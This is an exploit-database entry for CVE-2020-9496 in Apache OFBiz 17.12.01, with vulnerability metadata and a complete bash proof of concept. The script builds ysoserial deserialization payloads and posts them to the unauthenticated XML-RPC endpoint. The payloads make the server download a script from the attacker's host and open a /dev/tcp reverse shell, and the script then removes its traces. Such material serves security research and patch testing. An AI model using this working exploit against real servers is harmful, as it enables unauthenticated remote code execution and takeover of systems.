header-logo
Suggest Exploit
vendor:
Apache OfBiz
by:
Álvaro Muñoz, Adrián Díaz (s4dbrd)
6,1
CVSS
MEDIUM
Remote Command Execution (RCE)
502
CWE
Product Name: Apache OfBiz
Affected Version From: 17.12.01
Affected Version To: 17.12.01
Patch Exists: YES
Related CWE: CVE-2020-9496
CPE: a:apache:ofbiz
Metasploit: N/A
Other Scripts: https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/linux/http/apache_ofbiz_deserializationhttps://www.infosecmatter.com/nessus-plugin-library/?id=148239https://www.infosecmatter.com/nessus-plugin-library/?id=133758https://www.infosecmatter.com/list-of-metasploit-linux-exploits-detailed-spreadsheet/https://www.infosecmatter.com/nessus-plugin-library/?id=87239https://www.infosecmatter.com/bug-bounty-tips-10-dec-24/https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/windows/local/bypassuac_fodhelper
Tags: ofbiz,packetstorm,cve,cve2020,apache,java
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Nuclei References: http://packetstormsecurity.com/files/158887/Apache-OFBiz-XML-RPC-Java-Deserialization.htmlhttp://packetstormsecurity.com/files/161769/Apache-OFBiz-XML-RPC-Java-Deserialization.htmlhttps://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbizhttps://s.apache.org/l0994https://nvd.nist.gov/vuln/detail/CVE-2020-9496
Nuclei Metadata: {'max-request': 1, 'vendor': 'apache', 'product': 'ofbiz'}
Platforms Tested: Linux
2021

ApacheOfBiz 17.12.01 – Remote Command Execution (RCE) via Unsafe Deserialization of XMLRPC arguments

Apache OFBiz 17.12.03 contains cross-site scripting and unsafe deserialization vulnerabilities via an XML-RPC request.

Mitigation:

Authentication should be used for XMLRPC requests.
Source

Exploit-DB raw data:

# Exploit Title: ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) via Unsafe Deserialization of XMLRPC arguments
# Date: 2021-08-04
# Exploit Author: Álvaro Muñoz, Adrián Díaz (s4dbrd)
# Vendor Homepage: https://ofbiz.apache.org/index.html
# Software Link: https://archive.apache.org/dist/ofbiz/apache-ofbiz-17.12.01.zip
# Version: 17.12.01
# Tested on: Linux

# CVE : CVE-2020-9496

# Reference: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/

# Description: This CVE was discovered by Alvaro Muñoz, but I have created this POC to automate the process and the necessary requests to successfully exploit it and get RCE.

#!/usr/bin/env bash
 
# Because the 2 xmlrpc related requets in webtools (xmlrpc and ping) are not using authentication they are vulnerable to unsafe deserialization. 
# This issue was reported to the security team by Alvaro Munoz pwntester@github.com from the GitHub Security Lab team.
#
# This vulnerability exists due to Java serialization issues when processing requests sent to /webtools/control/xmlrpc.
# A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request. Successful exploitation would result in arbitrary code execution.
#
# Steps to exploit:
# 
# Step 1: Host HTTP Service with python3 (sudo python3 -m http.server 80)
# Step 2: Start nc listener (Recommended 8001).
# Step 3: Run the exploit.
 
 
url='https://127.0.0.1' # CHANGE THIS
port=8443 # CHANGE THIS
 
function helpPanel(){
    echo -e "\nUsage:"
    echo -e "\t[-i] Attacker's IP"
    echo -e "\t[-p] Attacker's Port"
    echo -e "\t[-h] Show help pannel"
    exit 1
}
 
 
function ctrl_c(){
    echo -e "\n\n[!] Exiting...\n"
    exit 1
}
# Ctrl + C
trap ctrl_c INT
 
function webRequest(){
    echo -e "\n[*] Creating a shell file with bash\n"
    echo -e "#!/bin/bash\n/bin/bash -i >& /dev/tcp/$ip/$ncport 0>&1" > shell.sh
    echo -e "[*] Downloading YsoSerial JAR File\n"
    wget -q https://jitpack.io/com/github/frohoff/ysoserial/master-d367e379d9-1/ysoserial-master-d367e379d9-1.jar
    echo -e "[*] Generating a JAR payload\n"
    payload=$(java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "wget $ip/shell.sh -O /tmp/shell.sh" | base64 | tr -d "\n")
    echo -e "[*] Sending malicious shell to server...\n" && sleep 0.5
    curl -s $url:$port/webtools/control/xmlrpc -X POST -d "<?xml version='1.0'?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns='http://ws.apache.org/xmlrpc/namespaces/extensions'>$payload</serializable></value></member></struct></value></param></params></methodCall>" -k  -H 'Content-Type:application/xml' &>/dev/null
    echo -e "[*] Generating a second JAR payload"
    payload2=$(java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "bash /tmp/shell.sh" | base64 | tr -d "\n")
    echo -e "\n[*] Executing the payload in the server...\n" && sleep 0.5
    curl -s $url:$port/webtools/control/xmlrpc -X POST -d "<?xml version='1.0'?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns='http://ws.apache.org/xmlrpc/namespaces/extensions'>$payload2</serializable></value></member></struct></value></param></params></methodCall>" -k  -H 'Content-Type:application/xml' &>/dev/null
    echo -e "\n[*]Deleting Files..."
    rm ysoserial-master-d367e379d9-1.jar && rm shell.sh
}
 
declare -i parameter_enable=0; while getopts ":i:p:h:" arg; do
    case $arg in
        i) ip=$OPTARG; let parameter_enable+=1;;
        p) ncport=$OPTARG; let parameter_enable+=1;;
        h) helpPanel;;
    esac
done
 
if [ $parameter_enable -ne 2 ]; then
    helpPanel
else
    webRequest
fi

Navigation

Suggest Exploit

Services By CQR